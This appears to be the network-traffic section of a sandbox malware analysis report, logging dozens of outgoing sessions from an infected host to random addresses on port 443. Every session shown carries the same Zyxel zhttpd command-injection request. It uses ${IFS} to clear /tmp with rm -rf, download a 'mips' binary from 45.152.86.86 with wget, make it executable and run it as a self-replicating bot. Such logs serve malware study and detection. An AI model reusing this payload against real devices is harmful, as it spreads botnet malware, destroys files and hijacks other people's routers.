                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182169914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7188192.168.2.1360102198.16.9.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182224989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7189192.168.2.135048627.164.20.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182226896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7190192.168.2.135822257.247.218.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182296991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7191192.168.2.133692696.161.90.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182301044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7192192.168.2.1338520188.177.75.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182334900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7193192.168.2.1352400186.140.182.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182420015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7194192.168.2.134874887.37.174.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182447910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7195192.168.2.1360732133.160.129.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182502985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7196192.168.2.134051883.226.239.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182527065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7197192.168.2.1351690153.189.10.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182564974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7198192.168.2.1345788113.235.238.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182590961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7199192.168.2.134968890.151.247.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182661057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7200192.168.2.135423841.209.39.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182682037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7201192.168.2.1339668205.220.196.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182734013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7202192.168.2.1346510193.122.254.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182768106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7203192.168.2.1351066223.44.200.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182786942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7204192.168.2.1333298185.50.58.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182848930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7205192.168.2.1340062101.91.189.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182904959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7206192.168.2.1352308173.174.153.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182951927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7207192.168.2.134851039.111.231.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182998896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7208192.168.2.1343892204.141.123.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183032036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7209192.168.2.134883212.157.82.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183089972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7210192.168.2.1349254123.186.120.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183155060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7211192.168.2.1345804179.111.233.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183197975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7212192.168.2.1337534158.186.161.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183244944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7213192.168.2.135260451.120.5.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183280945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7214192.168.2.1351114179.129.36.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183312893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7215192.168.2.1336546103.242.23.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183336020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7216192.168.2.1342928157.192.229.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183392048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7217192.168.2.1336822182.122.239.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183424950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7218192.168.2.1341646205.217.168.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183460951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7219192.168.2.1359918102.232.232.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183490992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7220192.168.2.1353816218.25.0.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183516026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7221192.168.2.1352700170.45.13.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183557987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7222192.168.2.1351582152.235.149.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183597088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7223192.168.2.1359784141.58.14.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183646917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7224192.168.2.134574052.99.23.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183676958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7225192.168.2.135271875.72.23.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183727980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7226192.168.2.1360654148.146.14.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183763027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7227192.168.2.1353410194.171.62.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183814049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7228192.168.2.1342578128.166.9.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183866024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7229192.168.2.1340208102.214.13.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183919907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7230192.168.2.1343722194.0.167.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183947086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7231192.168.2.1346228198.108.12.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.183980942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7232192.168.2.1356868148.218.194.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184019089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7233192.168.2.1356862147.5.196.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184043884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7234192.168.2.1333384207.220.30.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184077978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7235192.168.2.133963499.84.109.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184125900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7236192.168.2.1355162209.224.29.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184165955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7237192.168.2.1354824180.52.106.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184181929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7238192.168.2.13560684.210.221.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184201002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7239192.168.2.1335118103.171.19.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184289932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7240192.168.2.1353072213.168.107.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184325933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7241192.168.2.135641846.187.205.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184371948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7242192.168.2.135275457.59.138.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184413910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7243192.168.2.1360664121.222.89.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184448004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7244192.168.2.1358372170.8.17.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184498072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7245192.168.2.1344928151.11.172.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184535027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7246192.168.2.1344000114.104.235.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184561968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7247192.168.2.1356548159.112.88.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184595108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7248192.168.2.13344705.187.127.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184633970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7249192.168.2.135413041.213.184.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184662104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7250192.168.2.1340480196.6.85.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184727907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7251192.168.2.134687669.164.220.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184781075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7252192.168.2.135971449.148.4.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184803009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7253192.168.2.134343079.106.243.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184834003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7254192.168.2.1352346132.11.13.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184854984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7255192.168.2.133432819.205.188.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184921026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7256192.168.2.1352676209.165.195.225443
                              TimestampBytes transferredDirectionData
